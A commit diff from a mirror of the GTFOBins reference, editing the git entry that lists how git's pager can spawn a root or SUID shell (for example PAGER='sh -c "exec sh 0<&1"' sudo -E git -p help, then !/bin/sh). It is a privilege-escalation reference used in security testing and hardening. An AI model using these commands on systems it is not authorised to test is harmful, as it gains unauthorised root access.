mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
parent
aa08187718
commit
bd1d10bd03
@ -8,9 +8,9 @@ functions:
|
|||||||
!/bin/sh
|
!/bin/sh
|
||||||
sudo:
|
sudo:
|
||||||
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
|
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
|
||||||
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. Several capabilities might be dropped in the child process using this method.
|
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||||||
code: |
|
code: |
|
||||||
sudo git help config
|
sudo git -p help config
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
limited-suid:
|
limited-suid:
|
||||||
- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
|
- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
|
||||||
|
Loading…
Reference in New Issue
Block a user